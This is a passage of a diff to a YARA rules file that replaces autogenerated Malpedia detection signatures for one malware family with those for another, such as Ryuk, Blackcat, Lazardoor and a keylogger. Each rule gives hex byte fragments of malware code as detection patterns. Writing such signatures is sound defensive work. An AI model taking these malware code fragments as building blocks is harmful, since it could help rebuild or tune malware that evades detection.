"https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.expiro_auto.yar#L1-L127" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.netrepser_keylogger" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.netrepser_keylogger_auto.yar#L1-L175" license_url = "N/A" - logic_hash = "c555162dc1357feb9808816e071d9b9f76383f5167ecd985c2225c4cf3cc9bed" + logic_hash = "afbddedf93927cf0ceddcdc20a2ff3aea4d270191a04c2cfa6d38a1b702f0067" score = 75 quality = 75 tags = "FILE" @@ -147390,32 +150240,38 @@ rule MALPEDIA_Win_Expiro_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 33c9 6689147e 3bcd 5f 1bc0 5e } - $sequence_1 = { 52 e8???????? 83c404 33c0 668944244c 6a04 897c2464 } - $sequence_2 = { 0f848f000000 803d????????00 0f8582000000 803d????????00 7579 8d8c24cc010000 } - $sequence_3 = { 8b4d00 eb02 8bcd 8d3441 0fb703 } - $sequence_4 = { b8???????? 8d4c2414 e8???????? 8d442414 50 8d4c2434 51 } - $sequence_5 = { 7373 7373 7353 7373 13ea 02abd9737373 } - $sequence_6 = { bf5c000000 52 55 8d5fa5 33c0 897c241c } - $sequence_7 = { 0fb74208 f6c303 7409 8d04c5c6234100 eb23 f6c30c } - $sequence_8 = { 31733e 45 cf 7160 7373 7308 7373 } - $sequence_9 = { 7373 7377 7373 7373 7373 7373 93 } + $sequence_0 = { 8a55f3 80c201 8855f3 837df807 7517 0fbe45f3 c6840570ffffff3a } + $sequence_1 = { 51 8b5508 52 ff15???????? eb71 8d45ec 50 } + $sequence_2 = { 51 680104c378 e8???????? 83c40c 8d55e8 52 } + $sequence_3 = { 8945f4 8b45f4 33d2 b900ca9a3b f7f1 8955f4 8b55f4 } + $sequence_4 = { 33c9 894ddc 894de0 894de4 894de8 c745dc10000000 c745e001000000 } + $sequence_5 = { 8b55f0 52 ff15???????? 8b45c0 8be5 } + $sequence_6 = { c645f274 c645f369 c645f466 c645f569 } + $sequence_7 = { 7e0b 83bde4feffff08 7d02 ebcb 83bde4feffff1a 7e0b } + $sequence_8 = { c744240c57726974 c74424106550726f c744241463657373 c74424184d656d6f c744241c72790000 ff15???????? a3???????? } + $sequence_9 = { 8b701c 8bcf e8???????? 8b4c240c } + $sequence_10 = { 51 c74424084f70656e c744240c50726f63 c744241065737300 ff15???????? a3???????? 8b542448 } + $sequence_11 = { 56 33ff 53 8906 894e08 } + $sequence_12 = { 68???????? ff15???????? 8bf8 85ff 7472 } + $sequence_13 = { 55 8b6c244c 85c0 7550 } + $sequence_14 = { f3a5 8b8c24b4000000 a4 8db329010000 56 } + $sequence_15 = { b840000000 55 89442410 89442414 8d442410 50 8d4c2418 } condition: - 7 of them and filesize <3776512 + 7 of them and filesize <303104 } -rule MALPEDIA_Win_Glooxmail_Auto : FILE +rule MALPEDIA_Win_Lazardoor_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "9fc08289-2c15-5e6a-a020-5e3374a227b0" + id = "2eb37290-3e1c-5665-a83e-f5adb7297910" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.glooxmail" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.glooxmail_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lazardoor" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lazardoor_auto.yar#L1-L121" license_url = "N/A" - logic_hash = "3f9c49f2bcdac7dc8871b003117cb741dd79fa085062dcf8b6237e67caf4dc2a" + logic_hash = "0bf4197e05236eb2be49432405132a9996b398c538e39f55b3ceea025a90e3ab" score = 75 quality = 75 tags = "FILE" @@ -147429,32 +150285,32 @@ rule MALPEDIA_Win_Glooxmail_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 834dfcff 6a00 53 8d4d38 } - $sequence_1 = { e8???????? 899c2460800000 895c240c 895c2410 68ff7f0000 8d442451 53 } - $sequence_2 = { 57 8d8c24f4030000 e8???????? 8d8c2418080000 51 8d8c24f4030000 c684246408000030 } - $sequence_3 = { 0f840c000000 8365f0fe 8d4dc4 e9???????? c3 8b542408 8d420c } - $sequence_4 = { b8???????? e9???????? 8d4d00 e9???????? 8d4dd4 e9???????? 8d4dd4 } - $sequence_5 = { 59 c3 8b85acf7ffff 2500000400 0f8415000000 81a5acf7fffffffffbff } - $sequence_6 = { e8???????? 8bd9 895de8 8d7b04 8d7308 c703???????? c707???????? } - $sequence_7 = { c700???????? c74004???????? c74008???????? c7400cb04a4400 c74010bc4a4400 c74014c84a4400 c74018d44a4400 } - $sequence_8 = { 8d8d2cffffff e9???????? c3 8b542408 8d82acfbffff 8b8aa8fbffff 33c8 } - $sequence_9 = { ff750c 8b01 ff5044 84c0 7504 b301 eb02 } + $sequence_0 = { 488bd1 488bc1 48c1f806 4c8d05f4f60000 } + $sequence_1 = { 428a8c3998a50100 482bd0 8b42fc d3e8 443bc8 0f8d09010000 488b4b28 } + $sequence_2 = { 4053 4883ec20 488d05575a0100 488bd9 488901 f6c201 740a } + $sequence_3 = { 8905???????? 0f1105???????? 8b15???????? 4533c9 488b0d???????? 4533c0 } + $sequence_4 = { 4d85c0 7410 488d15615b0200 488bc8 } + $sequence_5 = { 44392d???????? 743d 4533c9 4c896c2430 c744242880000000 } + $sequence_6 = { 660f6e5cc610 660f62d8 660f6fc7 660f6cda 660ffec4 660f76de } + $sequence_7 = { 33d2 e8???????? 3bc3 7565 03fb 8b1d???????? 3bfb } + $sequence_8 = { ba5a540000 e9???????? 8b05???????? 85c0 } + $sequence_9 = { 4c8bc1 b84d5a0000 66390525b6ffff 7578 48630d58b6ffff 488d1515b6ffff 4803ca } condition: - 7 of them and filesize <761856 + 7 of them and filesize <405504 } -rule MALPEDIA_Win_Catb_Auto : FILE +rule MALPEDIA_Win_Socksbot_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "515d6ff4-29b8-5f9d-8e4d-ae72db2e24b8" + id = "9bcf8cfe-6674-56a4-ae23-27a14bd76431" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.catb" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.catb_auto.yar#L1-L118" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.socksbot" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.socksbot_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "9a8c29b856252443b361ebb50acc406bc1908e5c4eee2fd3c5627837db3c96fd" + logic_hash = "751966a23ad60ac8819a9938a949afcb7d6a09a99a37898a0110d849f807b7bf" score = 75 quality = 75 tags = "FILE" @@ -147468,32 +150324,32 @@ rule MALPEDIA_Win_Catb_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 418bcc e8???????? 85c0 0f8484000000 488b442440 488d0d22920300 } - $sequence_1 = { 4c8d050e9c0300 83e23f 488bcb 48c1f906 488d14d2 498b0cc8 8064d138fd } - $sequence_2 = { 488d159bdc0000 483950f0 740b 488b10 } - $sequence_3 = { 4c8d0da47f0000 b903000000 4c8d05907f0000 488d15f9750000 e8???????? 4885c0 740f } - $sequence_4 = { 4533c0 488d0d8e0e0400 baa00f0000 e8???????? 85c0 740a ff05???????? } - $sequence_5 = { 4c8d0d6bab0300 4c8bc6 488bd7 488bcb e8???????? } - $sequence_6 = { 4c8d0d922affff 4c8b4570 8b5568 488b4d60 } - $sequence_7 = { 4053 4883ec20 8bd9 4c8d0d05d00000 } - $sequence_8 = { 488d0d72190400 e8???????? 488b442438 488905???????? 488d442438 4883c008 } - $sequence_9 = { 488bc3 498784f6803c0400 4885c0 7409 } + $sequence_0 = { 6a50 ff7508 33f6 8975fc e8???????? 8bd8 59 } + $sequence_1 = { 59 e9???????? 55 8bec ff4d0c 7509 ff7508 } + $sequence_2 = { 46 8a1c39 41 3b4d0c 7cce 5f 8935???????? } + $sequence_3 = { 6a00 ff7508 6a03 e8???????? 83c410 ff7704 } + $sequence_4 = { 48 741b 48 7536 53 } + $sequence_5 = { e8???????? 8bd8 8b45fc 8945f0 83c008 } + $sequence_6 = { 8b75fc 53 ff15???????? 57 e8???????? } + $sequence_7 = { 75ed ff7508 6bc94c 8b5dfc 03cf 51 53 } + $sequence_8 = { 8a0c37 880e 4a 75f7 } + $sequence_9 = { 81c60c000100 4b 75d2 68???????? ff15???????? a0???????? } condition: - 7 of them and filesize <593920 + 7 of them and filesize <73728 } -rule MALPEDIA_Win_Httpsuploader_Auto : FILE +rule MALPEDIA_Win_Rumish_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "be17d448-1d90-5f75-8f13-d63b39944dc3" + id = "c7d955e8-6589-5477-8769-7cb86586e6f1" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.httpsuploader" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.httpsuploader_auto.yar#L1-L122" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rumish" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rumish_auto.yar#L1-L133" license_url = "N/A" - logic_hash = "5be7e6e5938fcb4fa9787510fb0867a1f442345e4d8453db75c177a24413afa4" + logic_hash = "eaf86e8ce2c9b9b903be9f070aac683527bbc8f25626d1b33901e14e32dd278c" score = 75 quality = 75 tags = "FILE" @@ -147507,32 +150363,32 @@ rule MALPEDIA_Win_Httpsuploader_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 33ff 33d2 41b806020000 6689bc2470020000 e8???????? 488d4c2451 33d2 } - $sequence_1 = { 33d2 33c9 897c2428 48895c2420 ff15???????? eb3b 488d0dc3bd0000 } - $sequence_2 = { 4883ec20 488bfa 488bd9 488d0501700000 488981a0000000 83611000 } - $sequence_3 = { 4c8bc0 418bd4 e8???????? 488d8dd0000000 ff15???????? } - $sequence_4 = { 488d0d6c280000 4533c9 ba00000040 4489442420 ff15???????? } - $sequence_5 = { 4c8d25cf7d0000 f0ff09 7511 488b8eb8000000 493bcc } - $sequence_6 = { 488d0543b50000 eb04 4883c014 4883c428 c3 4053 } - $sequence_7 = { 488d158e380000 488bc8 ff15???????? 4885c0 0f847a010000 } - $sequence_8 = { 81fa01010000 7d13 4863ca 8a44191c 4288840170fa0000 } - $sequence_9 = { 745e 6666660f1f840000000000 488b0d???????? 488d542440 4533c9 4533c0 ff15???????? } + $sequence_0 = { 8d450c 50 e8???????? 8b4df8 e8???????? 8b45f8 8be5 } + $sequence_1 = { eb46 68???????? 8d8d78feffff e8???????? eb34 68???????? 8d8d78feffff } + $sequence_2 = { 7375 8b9570ffffff 0faf5580 039574ffffff 899574feffff 8d8574feffff 50 } + $sequence_3 = { 898534ffffff 8b8d34ffffff 3b4d94 7d40 e8???????? 8985a8feffff } + $sequence_4 = { 8d8df0faffff e8???????? e9???????? 68???????? 8d8df0faffff e8???????? e9???????? } + $sequence_5 = { 0fbf4dbc 898d30ffffff 8b9530ffffff 83ea04 899530ffffff 83bd30ffffff0b 0f87a4020000 } + $sequence_6 = { 7d5d e8???????? 898560ffffff db8560ffffff dc0d???????? dc35???????? d9bd5effffff } + $sequence_7 = { e8???????? 6a01 8b55f0 52 8b4d9c 83c10c e8???????? } + $sequence_8 = { 8bec 83ec08 894df8 51 8bcc 8965fc 8d450c } + $sequence_9 = { 83e901 898d80feffff 8d9580feffff 52 8d4d84 e8???????? 8b4580 } condition: - 7 of them and filesize <190464 + 7 of them and filesize <770048 } -rule MALPEDIA_Win_Emdivi_Auto : FILE +rule MALPEDIA_Win_Gophe_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "c7c959fb-e496-5370-834c-2f119e1d6751" + id = "16e0cb01-a4d6-50a6-a1a9-0b51a47ac5bb" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.emdivi" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.emdivi_auto.yar#L1-L118" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gophe" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.gophe_auto.yar#L1-L156" license_url = "N/A" - logic_hash = "e1fc98ee3cf386dcf808c43ff2c4f0b6085fa811a19f892f7791e8e62f91b120" + logic_hash = "76443f258bf0b4ec57a2e148e70e44580d537156fff783e9c0d09eeae8abd68d" score = 75 quality = 75 tags = "FILE" @@ -147546,34 +150402,40 @@ rule MALPEDIA_Win_Emdivi_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 0fbe441fff 83c404 2bd8 8bf3 8d4601 } - $sequence_1 = { 59 c745e401000000 c745e803000000 c745ec05000000 894df0 c745f408000000 c745f80a000000 } - $sequence_2 = { c645f800 e8???????? 8b45d4 5b 8b4dfc 33cd 5f } - $sequence_3 = { ff5108 e8???????? c3 beff010000 56 } - $sequence_4 = { ff750c 8365e000 ff7508 33c0 c645e400 8d7de5 } - $sequence_5 = { 5f c9 c3 6a1f } - $sequence_6 = { eb07 888415b4fdffff 42 41 41 } - $sequence_7 = { 8bf0 e8???????? 99 2bf7 f7fe } - $sequence_8 = { 55 8bec 53 56 6a03 5b } - $sequence_9 = { 83e003 33d2 3955f0 8945f8 } + $sequence_0 = { 833902 0f94c0 84c0 7407 } + $sequence_1 = { b905000000 ff15???????? 8b05???????? 85c0 } + $sequence_2 = { 56 8b7510 57 68???????? c70605000000 } + $sequence_3 = { b801000000 eb09 83c8ff eb04 } + $sequence_4 = { 51 a1???????? 33c5 50 8d45f4 64a300000000 68e0000000 } + $sequence_5 = { 5b 8be5 5d c3 b896ffffff } + $sequence_6 = { 64a300000000 68e0000000 e8???????? 83c404 } + $sequence_7 = { 6805010000 8d85e0fdffff 50 68???????? } + $sequence_8 = { 85c9 0f94c0 89431c 85c9 } + $sequence_9 = { 7838 488b4c2440 ff15???????? 8bf8 } + $sequence_10 = { 2bf0 b8abaaaa2a f7ee c1fa03 8bf2 } + $sequence_11 = { 8bf8 488b4c2440 488b01 ff5010 85ff } + $sequence_12 = { e8???????? 488d942488000000 488d4c2460 e8???????? } + $sequence_13 = { c684249000000000 488b542440 488b4a10 668379300b } + $sequence_14 = { 6a00 56 e8???????? 83c40c c706ffffffff } + $sequence_15 = { 5d c3 b896ffffff 5f 5e 5b } condition: - 7 of them and filesize <581632 + 7 of them and filesize <1582080 } -rule MALPEDIA_Win_Cruloader_Auto : FILE +rule MALPEDIA_Elf_Blackcat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "975bd752-b718-50f1-9af8-cfa41728edc9" + id = "8a7e13ba-9ed1-59ed-8fb9-9aaa610fbd94" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cruloader" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cruloader_auto.yar#L1-L124" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/elf.blackcat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/elf.blackcat_auto.yar#L1-L113" license_url = "N/A" - logic_hash = "a1572c6250fefbf1b80a173c44c61e578e12fe07ff0f92d960b828b4e32b23d4" - score = 75 - quality = 75 + logic_hash = "1ac97428ed273512eef4209d87a29f49ce26e88d11cb15b15e2f2687ea017381" + score = 60 + quality = 45 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -147585,32 +150447,32 @@ rule MALPEDIA_Win_Cruloader_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 53 ff15???????? 6a04 6800100000 ff35???????? 6a00 } - $sequence_1 = { 6bf638 8b0c8dd85e4100 80643128fd 5f 5e c9 c3 } - $sequence_2 = { 0f1005???????? 50 0f1145e0 ff15???????? 33c9 90 8a540dd0 } - $sequence_3 = { 3bf7 72e9 5f f7d0 5e 8be5 } - $sequence_4 = { 88540dc0 41 3bc8 7ced } - $sequence_5 = { 83c404 0f1000 6a00 0f1185ccfbffff ff15???????? } - $sequence_6 = { 833d????????00 0f851c0e0000 8d0db02f4100 ba1b000000 e9???????? a900000080 7517 } - $sequence_7 = { 7309 80341961 41 3bca 72f7 e8???????? 8d45ec } - $sequence_8 = { 0f8c5cffffff c705????????01000000 8b7d08 83c8ff } - $sequence_9 = { 0f8494010000 8bb5e4fcffff 8d45f4 50 ff7354 57 ff75e8 } + $sequence_0 = { e8???????? 0f0b 90 90 90 90 53 } + $sequence_1 = { 69c0???????? c1e811 6bf064 29f2 0fb7d2 } + $sequence_2 = { e8???????? 0f0b 90 53 } + $sequence_3 = { 89c1 3d???????? 7319 c1e906 } + $sequence_4 = { 660f7f8424f0010000 660f7f8424e0010000 660f7f8424d0010000 660f7f8424c0010000 660f7f8424b0010000 } + $sequence_5 = { d1e9 01d1 c1e902 8d14cd00000000 } + $sequence_6 = { b801000000 81f9???????? 0f823fffffff b802000000 } + $sequence_7 = { 69c0???????? c1e810 29c2 0fb7d2 d1ea } + $sequence_8 = { 762a 0fb6c8 8d1489 8d0cd1 } + $sequence_9 = { e8???????? 0f0b e8???????? 0f0b 90 90 90 } condition: - 7 of them and filesize <196608 + 7 of them and filesize <8011776 } -rule MALPEDIA_Win_Webc2_Table_Auto : FILE +rule MALPEDIA_Win_Quickmute_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "398ecdfa-bd77-5001-b308-7e740d6a25e6" + id = "3ebd5405-d3fe-5b1c-9991-79b28ea4d116" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_table" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.webc2_table_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.quickmute" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.quickmute_auto.yar#L1-L113" license_url = "N/A" - logic_hash = "659cc34946aa5d8ea6957b273afd39f56e48147569d9730da4a86aafe181a1ab" + logic_hash = "94d7bee668e9656185345d12aa56e27e4c1baa2644d60d5f43d4b597af8c5206" score = 75 quality = 75 tags = "FILE" @@ -147624,34 +150486,34 @@ rule MALPEDIA_Win_Webc2_Table_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d85e4feffff 50 ff75fc ff15???????? 85c0 0f8461010000 } - $sequence_1 = { 83c410 881d???????? 8345fc04 ff4dec 0f8567feffff } - $sequence_2 = { 8dbda1fcffff 889da0fcffff f3ab 66ab aa 8d859cfbffff 6804010000 } - $sequence_3 = { 53 894dec ffd6 59 } - $sequence_4 = { 8b45f4 bf???????? 57 50 885c30f4 8b35???????? } - $sequence_5 = { 50 53 ff15???????? 85c0 750a ff15???????? 32c0 } - $sequence_6 = { ff75fc 8d85bcfdffff 50 e8???????? 59 } - $sequence_7 = { 50 8945e8 e8???????? 83c40c 895df8 8d45c4 } - $sequence_8 = { e8???????? 0fb745e0 50 0fb745de 50 } - $sequence_9 = { ff7508 6a01 50 ff15???????? 56 } + $sequence_0 = { 6a00 ff15???????? 50 ff15???????? 5f c3 } + $sequence_1 = { 750c 8d4dd8 51 56 } + $sequence_2 = { 8d55c0 52 56 ffd7 a3???????? 833d????????00 c6854cffffff54 } + $sequence_3 = { 8d9578edffff 52 6a03 ff15???????? 3bc3 745c } + $sequence_4 = { 885dae 391d???????? 750c 8d4da8 } + $sequence_5 = { 56 68???????? ff15???????? 83c408 8b751c } + $sequence_6 = { 7510 53 6a40 ff15???????? 53 } + $sequence_7 = { c7459030002900 c7459420006c00 c7459869006b00 c7459c65002000 } + $sequence_8 = { 6a00 50 8946f8 ff15???????? } + $sequence_9 = { c78542ffffff63746f72 66c78546ffffff7957 c68548ffffff00 750f } condition: - 7 of them and filesize <49152 + 7 of them and filesize <146432 } -rule MALPEDIA_Win_Bit_Rat_Auto : FILE +rule MALPEDIA_Win_Ryuk_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "49210a4b-5430-57e8-a054-5667e0ae3196" + id = "9762637f-3260-5c34-b846-45fb6634f5b4" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bit_rat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bit_rat_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ryuk" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ryuk_auto.yar#L1-L425" license_url = "N/A" - logic_hash = "eb9ba4fd39163b3bb9047c43b4366afc9171afe908b68fc3b3d7fbbef1990e08" + logic_hash = "b1841a1134c1a11658d85f36006ba9e8e5ed64f6492350418145712079afb53f" score = 75 - quality = 75 + quality = 50 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -147663,32 +150525,69 @@ rule MALPEDIA_Win_Bit_Rat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 85c9 753f 6a00 6a00 68c1000000 6809020000 6a28 } - $sequence_1 = { ff7608 ff74241c e8???????? 8be8 83c408 85ed 7425 } - $sequence_2 = { e8???????? 8be8 83c408 85ed 7930 6a00 6a00 } - $sequence_3 = { 8be5 5d c3 8b4510 8320b7 c7400400000000 33c0 } - $sequence_4 = { e8???????? 83c408 85c0 74cf 894704 8b450c 895f10 } - $sequence_5 = { f20f114af8 f20f1142f0 0fbf06 660f6ec8 0fbf46fe 83c608 f30fe6c9 } - $sequence_6 = { f644242401 895c2410 7413 83faff 0f84f5000000 42 89542414 } - $sequence_7 = { eb12 6a00 6a00 6a06 6a79 6a2c e8???????? } - $sequence_8 = { f00fc14108 48 7505 8b01 ff5004 8b4df4 64890d00000000 } - $sequence_9 = { c70100000000 83c104 83c204 3bce 75e8 8bc2 5e } + $sequence_0 = { 68???????? 6a01 6a00 6814010000 } + $sequence_1 = { ff15???????? 85c0 7508 6a01 ff15???????? 68???????? 6a01 } + $sequence_2 = { 6a08 6a18 68???????? 68???????? 68???????? ff15???????? } + $sequence_3 = { 754c b90b010000 66398818000035 753e 8b4508 b9???????? 2bc1 } + $sequence_4 = { 68???????? ff15???????? 85c0 7578 6a10 6a18 } + $sequence_5 = { 755d a1???????? 81b8????????50450000 754c b90b010000 66398818000035 } + $sequence_6 = { 68???????? ff15???????? 85c0 7542 6a28 6a18 } + $sequence_7 = { 68c0cf6a00 ff15???????? 6a01 ff15???????? } + $sequence_8 = { 7407 b801000000 eb0b eb04 } + $sequence_9 = { e8???????? 68e8030000 ff15???????? 68???????? e8???????? } + $sequence_10 = { 720f b901000000 6bd103 8b45fc c6041000 } + $sequence_11 = { 83c101 ba01000000 d1e2 8b45fc } + $sequence_12 = { 8908 895004 837df800 7709 } + $sequence_13 = { 89459c 8955a0 8b55a0 3b55f8 0f870b020000 } + $sequence_14 = { ba01000000 6bc203 8b55fc 880c02 b804000000 } + $sequence_15 = { ff15???????? b811000000 e9???????? e9???????? } + $sequence_16 = { ff15???????? 833d????????00 6a10 6a18 } + $sequence_17 = { 6a00 6814010000 ff7508 ff35???????? } + $sequence_18 = { 7407 48 85c0 7ff0 } + $sequence_19 = { ff15???????? b803000000 eb05 b805000000 } + $sequence_20 = { 2bf0 33c0 66890473 83ffff } + $sequence_21 = { 751b ff35???????? ff35???????? 6a01 68???????? e8???????? } + $sequence_22 = { eb0b 8bc1 99 f7fe } + $sequence_23 = { 56 ff15???????? 8bcb 8d5102 } + $sequence_24 = { 7714 7212 81f9d0070000 770a 85d2 } + $sequence_25 = { e8???????? e8???????? b9e8030000 ff15???????? } + $sequence_26 = { 668b02 83c202 6685c0 75f5 8d7bfe 2bd6 } + $sequence_27 = { 0f9fc0 5d c3 8bff 55 8bec 8b4508 } + $sequence_28 = { 5d c3 8bcb 8d5102 } + $sequence_29 = { d1fa 2bca 33c0 6689444bfe e9???????? 33c0 } + $sequence_30 = { 488bc3 4883c430 5b c3 48895c2408 48896c2410 4889742418 } + $sequence_31 = { 68???????? 53 d1fe e8???????? 83c408 8d5002 } + $sequence_32 = { 498bc1 c3 4053 4883ec20 8bc1 498bd8 } + $sequence_33 = { 50 51 e8???????? 6a00 6840420f00 52 50 } + $sequence_34 = { 83c602 6685c9 75f5 2bf2 68???????? 53 } + $sequence_35 = { f3a4 8d7afe 668b4702 8d7f02 6685c0 75f4 a1???????? } + $sequence_36 = { 4883c428 c3 48895c2408 57 4883ec30 8364242000 } + $sequence_37 = { 33c9 ba10270000 41b800100000 448d4904 ff15???????? } + $sequence_38 = { f7e1 8bc1 2bc2 d1e8 03c2 c1e806 6bc05a } + $sequence_39 = { ff15???????? 41b900300000 c744242040000000 448bc3 488bd6 488bcf } + $sequence_40 = { c744242802000000 4533c9 4533c0 c744242002000000 ba000000c0 } + $sequence_41 = { ff15???????? 488bd8 ff15???????? 83f820 7510 488bcb ff15???????? } + $sequence_42 = { 4533c9 4533c0 c744242003000000 ba00000040 ff15???????? 488bd8 ff15???????? } + $sequence_43 = { 66837f0254 750f 66837f0641 7508 } + $sequence_44 = { 4889442420 4c8bc6 488bd3 488bcf ff15???????? } + $sequence_45 = { ff15???????? 66833f4e 7516 66837f0254 750f } + $sequence_46 = { 84c0 746c e8???????? 488d0d63080000 e8???????? e8???????? } condition: - 7 of them and filesize <19405824 + 7 of them and filesize <7450624 } -rule MALPEDIA_Win_Moriya_Auto : FILE +rule MALPEDIA_Win_Industrial_Spy_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "b9f54a0c-1b70-575c-9b58-fd559fcd85cb" + id = "ce5f3e00-b3d5-5d7c-9715-f009f6dd4df1" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.moriya" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.moriya_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.industrial_spy" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.industrial_spy_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "ab28f31770f9afce25a3c5b829bb0d33a4cf408b2c3f7c40efc1893d68c2419a" + logic_hash = "0d309a929b9f93d00c001ba14e0da1de3852467890493f029087eefa2710c99c" score = 75 quality = 75 tags = "FILE" @@ -147702,32 +150601,32 @@ rule MALPEDIA_Win_Moriya_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8bce ff15???????? 4533c0 488d0dcf260000 33d2 } - $sequence_1 = { 488bfa 4c8d051c0d0000 33d2 8d5a4d 8bcb ff15???????? 4c8d05280d0000 } - $sequence_2 = { 8b4f10 8d81fffeffff 83f801 7608 81f910010000 7564 ba28000000 } - $sequence_3 = { 448d724d 418bce 0f114dc0 0f1145d0 ff15???????? } - $sequence_4 = { 4885c0 7509 4c8d05b60f0000 eba3 4c8d05dd0f0000 ff15???????? } - $sequence_5 = { ff15???????? 488b8c2498000000 4885c9 7405 e8???????? } - $sequence_6 = { ff15???????? 8bc3 488b8c2488000000 4833cc e8???????? 4881c490000000 415f } - $sequence_7 = { 33d2 ff15???????? 4883673800 488b0d???????? 4885c9 7467 } - $sequence_8 = { 4c8bc3 49ffc0 42803c0000 75f6 488b15???????? } - $sequence_9 = { 488b0d???????? 4885c9 7405 e8???????? 8bc7 488b4df0 } + $sequence_0 = { f7d1 8d9778a46ad7 23cb 448d8356b7c7e8 418bc3 4123c2 0bc8 } + $sequence_1 = { 8bc3 448bcf 410f104f10 4c8d442430 } + $sequence_2 = { 48895c2450 48895c2448 4883e804 4889442440 4533c9 4c8d442444 8b542440 } + $sequence_3 = { 8b5540 448b4544 4585ed 740f 899380000000 44898384000000 } + $sequence_4 = { 4c89742420 498bd4 498bcd c644043000 8d4301 0f11440430 410f104720 } + $sequence_5 = { 4881ec100e0000 4533e4 803d????????1f 7472 448925???????? } + $sequence_6 = { 837c8dc000 7508 ffca 4883e901 } + $sequence_7 = { 0f118424e8010000 f20f108424e0010000 f20f118424f8010000 0f108c24b8010000 0f118c2400020000 f20f108424c8010000 f20f11842410020000 } + $sequence_8 = { 4c8d4d50 895c2420 4c8d85a0030000 488d542430 488d4c2430 e8???????? } + $sequence_9 = { 0f8df5000000 e8???????? 488b8890000000 48399938010000 7516 488d05cb030100 } condition: - 7 of them and filesize <58368 + 